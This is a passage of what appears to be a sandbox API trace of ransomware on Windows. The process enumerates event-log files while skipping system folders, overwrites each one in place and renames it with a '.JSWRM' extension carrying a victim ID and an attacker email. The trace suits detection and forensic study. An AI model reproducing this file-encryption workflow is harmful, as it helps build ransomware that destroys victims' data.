[0065.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0065.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cchWideChar=64, lpMultiByteStr=0x22c6f0, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpUsedDefaultChar=0x0) returned 64 [0065.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0065.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0065.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0065.361] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.361] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.361] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.361] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.367] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.367] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.367] CloseHandle (hObject=0x450) returned 1 [0065.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0065.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0065.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0065.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0065.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0065.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0065.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.369] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0065.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0065.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0065.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0065.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0065.370] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1f96ca4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xe1f96ca4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-Bits-Client%4Operational.evtx", cAlternateFileName="MI9465~1.EVT")) returned 1 [0065.370] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2=".") returned 1 [0065.370] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="..") returned 1 [0065.370] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="...") returned 1 [0065.370] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="windows") returned -1 [0065.370] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="recovery") returned -1 [0065.370] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="perflogs") returned -1 [0065.370] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.370] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.370] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="system volume information") returned -1 [0065.370] lstrcmpiW (lpString1="Microsoft-Windows-Bits-Client%4Operational.evtx", lpString2="msocache") returned -1 [0065.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0065.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Bits-Client%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0065.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Bits-Client%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x1f84e8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Bits-Client%4Operational.evtx", lpUsedDefaultChar=0x0) returned 47 [0065.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0065.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0065.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Bits-Client%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0065.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-Bits-Client%4Operational.evtx", cchWideChar=47, lpMultiByteStr=0x1f87c0, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-Bits-Client%4Operational.evtx", lpUsedDefaultChar=0x0) returned 47 [0065.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0065.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0065.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0065.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0065.371] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.371] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.371] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.371] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.395] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.395] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.396] CloseHandle (hObject=0x450) returned 1 [0065.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0065.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0065.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0065.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0065.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0065.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0065.399] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f4d0 [0065.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.399] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0065.399] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0065.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0065.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0065.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.400] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.400] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783aa15, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8783aa15, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cAlternateFileName="MI03A7~1.EVT")) returned 1 [0065.400] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2=".") returned 1 [0065.400] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="..") returned 1 [0065.400] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="...") returned 1 [0065.400] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="windows") returned -1 [0065.400] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="recovery") returned -1 [0065.400] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="perflogs") returned -1 [0065.400] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.400] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.400] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="system volume information") returned -1 [0065.400] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="msocache") returned -1 [0065.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0065.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0065.400] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x20de78, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpUsedDefaultChar=0x0) returned 49 [0065.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0065.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0065.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0065.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x20e418, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpUsedDefaultChar=0x0) returned 49 [0065.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0065.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0065.401] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0065.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.401] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.401] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.401] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.401] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.401] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.408] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.408] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.409] CloseHandle (hObject=0x450) returned 1 [0065.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0065.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0065.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0065.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0065.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0065.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0065.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0065.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f970 [0065.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.411] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0065.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0065.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.419] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3c71c5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3c71c5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cAlternateFileName="MI5CA2~1.EVT")) returned 1 [0065.419] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2=".") returned 1 [0065.419] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="..") returned 1 [0065.419] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="...") returned 1 [0065.419] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="windows") returned -1 [0065.419] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="recovery") returned -1 [0065.419] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="perflogs") returned -1 [0065.419] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.419] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.419] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="system volume information") returned -1 [0065.420] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="msocache") returned -1 [0065.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 